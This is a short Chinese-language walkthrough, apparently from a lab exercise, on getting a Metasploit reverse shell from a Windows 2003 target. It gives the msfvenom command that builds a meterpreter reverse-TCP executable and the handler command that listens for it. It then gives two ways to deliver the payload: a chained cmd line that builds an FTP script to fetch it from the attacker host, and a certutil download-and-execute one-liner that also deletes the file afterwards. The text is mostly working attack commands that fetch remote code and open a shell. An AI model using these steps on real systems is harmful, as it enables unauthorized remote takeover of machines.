利用msf在windows下反弹shell

靶机地址：10.0.3.146

攻击者地址：10.0.3.120

 

思路：生成一个shell，让靶机下载下来并执行。方法一是利用ftp下载，方法二是利用可信证书下载http网站的内容。

通过命令执行可以知道靶机是windows2003，32位的。（命令执行systeminfo）

首先利用kali生成一个shell，

命令：msfvenom -p windows/meterpreter_reverse_tcp lhost=10.0.3.120 lport=7070 -f exe -o /tmp/win.exe

 

方法一：

打开ftp服务器

利用msf的 auxiliary/server/ftp模块，只需要设置路径就好了

访问一下 访问到说明开启成功

 

成功后把这个job放入后台 ，命令是back

接下来先在kali中开启监听

命令：handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

现在去靶机上通过cmd命令下载win.exe并执行

cmd命令：echo open 10.0.3.120>ttt.txt&echo anonymous>>ttt.txt&echo whatever>>ttt.txt&echo binary>>ttt.txt&echo get jet.exe>>ttt.txt&echo bye>>ttt.txt&ftp -s:ttt.txt

执行后可以用dir命令看是否下载成功

之后执行jet.exe

得到反弹shell

进入sessions1 命令：sessions 1

获得meterpreter

方法二，

此方法也是要先生成一个shell，文章开头有写，不重复了。

开启http服务

命令：python -m SimpleHTTPServer 80（在需要的目录下快速开启）

访问

在msf下开启监听： handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

在靶机命令执行处执行

cmd.exe /c "certutil.exe -urlcache -split -f http://10.0.3.120/jet.exe &jet.exe &del jet.exe"

成功返回shell